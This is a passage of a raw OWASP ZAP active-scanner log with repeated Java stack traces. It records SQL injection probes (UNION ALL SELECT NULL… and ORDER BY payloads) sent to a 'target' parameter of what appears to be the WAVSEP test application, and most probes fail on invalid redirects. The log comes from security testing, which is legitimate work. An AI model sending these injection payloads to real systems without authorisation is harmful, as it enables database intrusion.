org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681946 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681946 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7456#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7456# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681948 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681948 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681949 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681949 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681951 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681951 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681952 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681953 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681956 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681956 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681956 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681957 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 